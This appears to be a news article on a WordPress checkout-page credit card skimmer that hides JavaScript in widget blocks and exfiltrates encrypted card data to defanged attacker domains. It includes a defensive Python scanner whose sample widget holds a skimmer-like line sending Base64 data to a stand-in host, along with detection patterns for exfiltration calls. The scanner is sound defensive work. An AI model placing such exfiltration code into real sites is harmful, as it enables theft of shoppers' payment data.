New Credit Card Skimmer Targets WordPress E-Commerce Checkout Pages
On January 12, cybersecurity researchers discovered a credit card skimmer campaign targeting WordPress-based e-commerce sites. The campaign injects malicious JavaScript into the WordPress database to steal customers’ payment information.
Cyberattacks are mounting and use sophisticated techniques to target customers’ personal data. Experts are now voicing the need to properly understand how malware operates, whether by exploiting system vulnerabilities or by tricking users into granting access, because that same understanding is key to prevention.
Detecting Malicious JavaScript Code in WordPress
The new attack, identified by Sucuri (a GoDaddy-owned website security firm), embeds malicious JavaScript code under the “widget block” option. The hidden placement makes it harder for traditional security tools to detect the malicious JavaScript. Once the malware is injected, the skimmer activates only on checkout pages.
When a customer accesses a payment page, malicious JavaScript can hijack payment fields or inject a fraudulent form mimicking legitimate processors like Stripe. The fake form captures sensitive information, including credit card numbers, CVV codes, expiration dates, and billing details, compromising users’ financial security.
Data Exfiltration and Encryption
The stolen data is Base64 encoded and further encrypted with AES-CBC to evade detection. The encrypted data is then exfiltrated to attacker-controlled servers such as valhafather[.]xyz or fqbe23[.]xyz.
The malicious JavaScript attack on WordPress is part of a series of elaborate credit card skimming campaigns. In October last year, Sucuri reported a similar campaign where malicious JavaScript generated fake forms or scraped payment data from legitimate fields. The malware, at the time, employed multiple encryption layers to hide the stolen information.
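One way to scan for the traits described above (a script inside a widget block, checkout-only activation, Base64 and AES-CBC handling, data sent to an unfamiliar host), as an added example that is not Sucuri's or this article's code. It assumes the widget block HTML has already been exported from the WordPress database; the sample widgets, host names and allowlist are constructed.

```python
import re

# Constructed sample of widget block HTML as exported from the database.
# Not taken from the real campaign; the second entry only carries indicator strings.
SAMPLE_WIDGETS = {
    "block-2": '<h2>Recent Posts</h2><script src="https://shop.example/wp-includes/js/a.js"></script>',
    "block-7": ('<script>if(location.href.includes("checkout")){'
                'var k=crypto.subtle.importKey("raw",key,{name:"AES-CBC"},false,["encrypt"]);'
                'navigator.sendBeacon("https://collector.example.net/c",btoa(data));}</script>'),
}

# Assumption: hosts this shop legitimately loads scripts from or posts to.
ALLOWED_HOSTS = {"shop.example", "js.stripe.com"}

SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script\s*>", re.I | re.S)
URL_HOST_RE = re.compile(r"https?://([a-z0-9.-]+)", re.I)
INDICATORS = {
    "checkout-gated": re.compile(r"checkout", re.I),
    "base64": re.compile(r"\b(?:btoa|atob)\s*\(", re.I),
    "aes-cbc": re.compile(r"AES-CBC|crypto\.subtle", re.I),
    "exfil-call": re.compile(r"sendBeacon|XMLHttpRequest|fetch\s*\(|new\s+Image", re.I),
}

def scan_widget(html):
    """Return sorted findings for every <script> element in one widget."""
    findings = set()
    for attrs, body in SCRIPT_RE.findall(html):
        # Any URL in the tag attributes or inline code must be on the allowlist.
        for host in URL_HOST_RE.findall(attrs + " " + body):
            if host.lower() not in ALLOWED_HOSTS:
                findings.add("unlisted-host:" + host.lower())
        # Inline code is matched against the behaviours the article describes.
        if body.strip():
            for name, rx in INDICATORS.items():
                if rx.search(body):
                    findings.add(name)
    return sorted(findings)

def scan_all(widgets):
    """Map widget id -> findings, keeping only widgets with at least one finding."""
    return {wid: f for wid, html in widgets.items() if (f := scan_widget(html))}

if __name__ == "__main__":
    for wid, found in scan_all(SAMPLE_WIDGETS).items():
        print(wid, found)
```

A single indicator is weak evidence on its own; several of them together inside a widget, where inline script is rarely expected, is what warrants manual review.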
Threatening Landscape
While the malicious JavaScript WordPress scam is a big enough threat to online retailers, it’s part of a bigger, evolving wave of cyberattacks.
Researchers have also revealed a PayPal phishing scam where attackers send fraudulent emails appearing to come from PayPal.
Cybercriminals targeting Web3 cryptocurrency wallets are adopting what is known as transaction simulation spoofing, which exploits the wallet functionality that previews transactions and tricks victims into approving fraudulent transactions by displaying misleading details.
To protect a WordPress e-commerce site from these attacks, site owners must regularly update WordPress and its plugins so that security vulnerabilities are fixed.
They should also install security plugins that check JavaScript for malicious code and block threats. For more protection, enable two-factor authentication (2FA) for admin logins and payment gateways.
The WordPress skimmer highlights the growing sophistication and complexity of online threats. What matters is to maintain a strong security system and take proactive security measures, in addition to keeping people updated about emerging cyber tactics. Data protection is not easy, and security systems that scan JavaScript for malicious code should be in place.
Will WordPress succeed at preventing further malicious attacks before losing customer trust?